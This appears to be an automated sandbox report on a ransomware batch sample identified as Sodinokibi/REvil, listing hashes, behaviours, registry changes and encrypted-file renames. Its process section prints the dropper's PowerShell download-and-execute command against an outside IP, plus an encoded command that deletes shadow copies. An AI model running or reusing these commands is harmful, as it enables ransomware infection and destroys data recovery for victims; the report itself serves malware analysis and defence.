Analysis
  Max time kernel: 111s
  Max time network: 123s
  Platform: windows7_x64
  Resource: win7v191014
  Submitted: 10-02-2020 20:10

Static task: static1

Behavioral task: behavioral1
  Sample: hvQ21ebW.bat
  Resource: win7v191014 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: hvQ21ebW.bat
  Resource: win10v191014 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: hvQ21ebW.bat
  Size: 191B
  MD5: 7eb2eb2bf474386d8d7eef5ee2aaf3ef
  SHA1: c9789a38150044b9ca8a4b9d350df691611f1861
  SHA256: 29b2a12ef2c75d6bb1bdbb4536e478a386dc4082a0756adc219bbd25c724bd1c
  SHA512: 827139be92e830cc7e7d6ac935327fe8960508ecb5e59cf338fb3cd2cc7cda12ae5686f15709bf5fec2cfb399912a9803f7b372601802bcd27e928072638b512
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source URLs (ps1.dropper): http://185.103.242.78/pastes/hvQ21ebW
  Extracted
    Language: ps1
    Source:
Signatures

Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  description                        pid   process         target process
  PID 1184 wrote to memory of 1456   1184  cmd.exe         powershell.exe
  PID 1456 wrote to memory of 2020   1456  powershell.exe  powershell.exe
  PID 1456 wrote to memory of 2020   1456  powershell.exe  powershell.exe
  PID 1456 wrote to memory of 2020   1456  powershell.exe  powershell.exe
  PID 1456 wrote to memory of 2020   1456  powershell.exe  powershell.exe

Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow  pid   process
  8     1456  powershell.exe

Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality

Discovering connected drives (3 TTPs, 7 IoCs)
  Processes: powershell.exe, cmd.exe, powershell.exe
  description               ioc     process
  File opened (read-only)   \??\B:  powershell.exe
  File opened (read-only)   \??\E:  powershell.exe
  File opened (read-only)   \??\C:  cmd.exe
  File opened (read-only)   \??\C:  powershell.exe
  File opened (read-only)   \??\A:  powershell.exe
  File opened (read-only)   \??\F:  powershell.exe
  File opened (read-only)   \??\C:  powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  description      ioc                                                                                                                                                     process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ao09zq21.bmp"  powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  pid   process
  1456  powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  description                  pid   process
  Token: SeDebugPrivilege      1456  powershell.exe
  Token: SeDebugPrivilege      1456  powershell.exe
  Token: SeDebugPrivilege      2020  powershell.exe
  Token: SeBackupPrivilege     1568  vssvc.exe
  Token: SeRestorePrivilege    1568  vssvc.exe
  Token: SeAuditPrivilege      1568  vssvc.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe, powershell.exe
  pid   process
  1456  powershell.exe
  1456  powershell.exe
  1456  powershell.exe
  2020  powershell.exe
  2020  powershell.exe

Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  description  ioc                                                                                      process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                 vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer               vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                      vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe

Drops file in Program Files directory (33 IoCs)
  Processes: powershell.exe (all 33 entries below)
  description                   ioc
  File created                  \??\c:\program files\611dp0cc5-readme.txt
  File renamed                  C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.611dp0cc5
  File opened for modification  \??\c:\program files\StepConnect.temp
  File opened for modification  \??\c:\program files\UnregisterEnable.ods
  File renamed                  C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.611dp0cc5
  File renamed                  C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.611dp0cc5
  File renamed                  C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.611dp0cc5
  File renamed                  C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.611dp0cc5
  File renamed                  C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.611dp0cc5
  File renamed                  C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.611dp0cc5
  File opened for modification  \??\c:\program files\UseSkip.xps
  File renamed                  C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.611dp0cc5
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\611dp0cc5-readme.txt
  File opened for modification  \??\c:\program files\DebugRevoke.txt
  File opened for modification  \??\c:\program files\RegisterJoin.vsd
  File renamed                  C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.611dp0cc5
  File opened for modification  \??\c:\program files\ConfirmUpdate.mpeg2
  File opened for modification  \??\c:\program files\ConvertFromGet.xla
  File renamed                  C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.611dp0cc5
  File opened for modification  \??\c:\program files\PushFormat.jpe
  File opened for modification  \??\c:\program files\UnprotectWait.html
  File renamed                  C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.611dp0cc5
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\611dp0cc5-readme.txt
  File opened for modification  \??\c:\program files\ImportLimit.rm
  File opened for modification  \??\c:\program files\JoinMove.vbs
  File opened for modification  \??\c:\program files\MountBlock.xltx
  File opened for modification  \??\c:\program files\PublishCopy.ppt
  File renamed                  C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.611dp0cc5
  File opened for modification  \??\c:\program files\WaitDebug.mhtml
  File created                  \??\c:\program files (x86)\611dp0cc5-readme.txt
  File created                  \??\c:\program files\microsoft sql server compact edition\611dp0cc5-readme.txt
  File renamed                  C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.611dp0cc5
  File renamed                  C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.611dp0cc5
Processes

C:\Windows\system32\cmd.exe (PID 1184, depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\hvQ21ebW.bat"
  Signatures:
    - Suspicious use of WriteProcessMemory
    - Discovering connected drives

  Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1456, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000"
    Signatures:
      - Suspicious use of WriteProcessMemory
      - Blacklisted process makes network request
      - Discovering connected drives
      - Sets desktop wallpaper using registry
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Drops file in Program Files directory

    Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2020, depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Signatures:
        - Discovering connected drives
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (PID 1568, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service